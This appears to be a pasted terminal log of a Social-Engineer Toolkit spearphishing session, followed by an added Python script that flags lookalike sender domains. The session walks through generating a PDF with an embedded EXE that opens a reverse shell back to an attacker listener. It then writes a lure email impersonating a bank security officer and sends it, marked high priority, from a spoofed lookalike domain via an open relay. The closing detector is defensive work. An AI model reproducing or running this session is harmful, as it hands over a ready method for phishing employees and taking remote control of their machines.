asdf

a guest
Aug 3rd, 2015
set> 1

The Spearphishing module allows you to specially craft email messages and send
them to a large (or small) number of people with attached fileformat malicious
payloads. If you want to spoof your email address, be sure "Sendmail" is in-
stalled (apt-get install sendmail) and change the config/set_config SENDMAIL=OFF
flag to SENDMAIL=ON.

There are two options, one is getting your feet wet and letting SET do
everything for you (option 1), the second is to create your own FileFormat
payload and use it in your own attack. Either way, good luck and enjoy!

1) Perform a Mass Email Attack
2) Create a FileFormat Payload
3) Create a Social-Engineering Template

99) Return to Main Menu

set:phishing>2

Select the file format exploit you want.
The default is the PDF embedded EXE.

********** PAYLOADS **********

1) SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP)
2) SET Custom Written Document UNC LM SMB Capture Attack
3) MS14-017 Microsoft Word RTF Object Confusion (2014-04-01)
4) Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow
5) Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087)
6) Adobe Flash Player "Button" Remote Code Execution
7) Adobe CoolType SING Table "uniqueName" Overflow
8) Adobe Flash Player "newfunction" Invalid Pointer Use
9) Adobe Collab.collectEmailInfo Buffer Overflow
10) Adobe Collab.getIcon Buffer Overflow
11) Adobe JBIG2Decode Memory Corruption Exploit
12) Adobe PDF Embedded EXE Social Engineering
13) Adobe util.printf() Buffer Overflow
14) Custom EXE to VBA (sent via RAR) (RAR required)
15) Adobe U3D CLODProgressiveMeshDeclaration Array Overrun
16) Adobe PDF Embedded EXE Social Engineering (NOJS)
17) Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow
18) Apple QuickTime PICT PnSize Buffer Overflow
19) Nuance PDF Reader v6.0 Launch Stack Buffer Overflow
20) Adobe Reader u3D Memory Corruption Vulnerability
21) MSCOMCTL ActiveX Buffer Overflow (ms12-027)

set:payloads>12


[-] Default payload creation selected. SET will generate a normal PDF with embedded EXE.

1. Use your own PDF for attack
2. Use built-in BLANK PDF for attack

set:payloads>2

1) Windows Reverse TCP Shell Spawn a command shell on victim and send back to attacker
2) Windows Meterpreter Reverse_TCP Spawn a meterpreter shell on victim and send back to attacker
3) Windows Reverse VNC DLL Spawn a VNC server on victim and send back to attacker
4) Windows Reverse TCP Shell (x64) Windows X64 Command Shell, Reverse TCP Inline
5) Windows Meterpreter Reverse_TCP (X64) Connect back to the attacker (Windows x64), Meterpreter
6) Windows Shell Bind_TCP (X64) Execute payload and create an accepting port on remote system
7) Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP using SSL and use Meterpreter

set:payloads>4
set> IP address for the payload listener: 8.8.8.8
set:payloads> Port to connect back on [443]:443
[-] Generating fileformat exploit...
[*] Payload creation complete.
[*] All payloads get sent to the /root/.set/template.pdf directory
[-] As an added bonus, use the file-format creator in SET to create your attachment.

Right now the attachment will be imported with filename of 'template.whatever'

Do you want to rename the file?

example Enter the new filename: moo.pdf

1. Keep the filename, I don't care.
2. Rename the file, I want to be cool.

set:phishing>2
set:phishing> New filename:Security Bulletin
[*] Filename changed, moving on...

Social Engineer Toolkit Mass E-Mailer

There are two options on the mass e-mailer, the first would
be to send an email to one individual person. The second option
will allow you to import a list and send it to as many people as
you want within that list.

What do you want to do:

1. E-Mail Attack Single Email Address
2. E-Mail Attack Mass Mailer

99. Return to main menu.

set:phishing>1

Do you want to use a predefined template or craft
a one time email template.

1. Pre-Defined Template
2. One-Time Use Email Template

set:phishing>2
set:phishing> Subject of the email:New Security Bulletin
set:phishing> Send the message as html or plain? 'h' or 'p' [p]:p
set:phishing> Enter the body of the message, hit return for a new line. Control+c when finished:Hello Mr. Public,
Next line of the body:
Next line of the body: This is Richard Young from the corporate office in New York.
Next line of the body: I wanted to make sure that you received our most recent security bulletin. It covers some very crucial information about protecting your systems from network based attacks.
Next line of the body: Please ensure that all of the employees at your Tempe, AZ branch read this as well.
Next line of the body:
Next line of the body: Thank you very much,
Next line of the body: Richard Young
Next line of the body: Security Operations Center
Next line of the body: First Bank of Acmeland^Cset:phishing> Send email to:jpublic@firstacmeland.com

1. Use a gmail Account for your email attack.
2. Use your own server or open relay

set:phishing>2
set:phishing> From address (ex: moo@example.com):ryoung@firstacme1and.com
set:phishing> The FROM NAME user will see: :Richard Young
set:phishing> Username for open-relay [blank]:
Password for open-relay [blank]:
set:phishing> SMTP email server address (ex. smtp.youremailserveryouown.com):smtp.firstacme1and.com
set:phishing> Port number for the SMTP server [25]:
set:phishing> Flag this message/s as high priority? [yes|no]:yes
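The session above ends with a From address of ryoung@firstacme1and.com, where the digit 1 stands in for the letter l in the target's own domain firstacmeland.com, and the message is sent high priority with a PDF attachment. As an added example that is not part of the paste or of SET, here is a small Python triage check of the kind a mail gateway or SOC script would run on inbound mail: it folds common confusable characters in the sender domain and compares the result against an allowlist of trusted domains, then notes the high-priority flag and the PDF attachment as supporting indicators. The trusted-domain list, the confusables table and the sample message are constructed for this example and modelled on the session, not captured from it.

```python
import email
from email import policy
from email.message import EmailMessage
from email.utils import parseaddr
from typing import Optional

# Hypothetical allowlist of domains the organisation really sends from (assumption).
TRUSTED_DOMAINS = {"firstacmeland.com"}

# Character sequences commonly substituted for look-alike letters in spoofed domains.
CONFUSABLES = {"rn": "m", "vv": "w", "1": "l", "0": "o", "3": "e", "5": "s", "7": "t"}


def normalise_domain(domain: str) -> str:
    """Fold look-alike characters back to the letters they imitate."""
    folded = domain.lower()
    for lookalike, letter in CONFUSABLES.items():
        folded = folded.replace(lookalike, letter)
    return folded


def lookalike_of(domain: str) -> Optional[str]:
    """Return the trusted domain that `domain` imitates, or None if it is trusted or unrelated."""
    domain = domain.lower()
    if domain in TRUSTED_DOMAINS:
        return None
    folded = normalise_domain(domain)
    for trusted in TRUSTED_DOMAINS:
        if folded == normalise_domain(trusted):
            return trusted
    return None


def sender_domain(msg: EmailMessage) -> str:
    """Domain part of the From header's address, ignoring the display name."""
    _display, addr = parseaddr(str(msg.get("From", "")))
    return addr.rpartition("@")[2].lower()


def triage(raw: bytes) -> dict:
    """Parse one RFC 5322 message and report lookalike-sender and lure indicators."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    domain = sender_domain(msg)
    impersonated = lookalike_of(domain)
    findings = []
    if impersonated:
        findings.append(f"sender domain {domain} is a lookalike of trusted domain {impersonated}")
    # A high-priority flag is weak on its own but strengthens a lookalike-sender finding.
    if str(msg.get("X-Priority", "")).startswith("1"):
        findings.append("message is flagged high priority")
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        if part.get_content_type() == "application/pdf" or name.lower().endswith(".pdf"):
            findings.append(f"PDF attachment {name!r}")
    return {
        "sender_domain": domain,
        "impersonates": impersonated,
        "findings": findings,
        "suspicious": impersonated is not None,
    }


def build_sample() -> bytes:
    """Constructed message modelled on the session in the paste (not a real capture)."""
    msg = EmailMessage()
    msg["From"] = "Richard Young <ryoung@firstacme1and.com>"
    msg["To"] = "jpublic@firstacmeland.com"
    msg["Subject"] = "New Security Bulletin"
    msg["X-Priority"] = "1 (Highest)"
    msg.set_content("Hello Mr. Public,\n\nThis is Richard Young from the corporate office in New York.\n")
    # Placeholder bytes stand in for the attachment; the header checks do not read its content.
    msg.add_attachment(b"%PDF-1.4 placeholder", maintype="application", subtype="pdf",
                       filename="Security Bulletin.pdf")
    return msg.as_bytes()


if __name__ == "__main__":
    for line in triage(build_sample())["findings"]:
        print("[!]", line)
```

The folding step is deliberately simple: it catches single-character substitutions like the 1-for-l here, and the "rn"/"vv" entries catch the two-letter imitations of m and w, but it does not cover Unicode homoglyphs in IDN domains, which a production check would handle by also comparing the domain's punycode form.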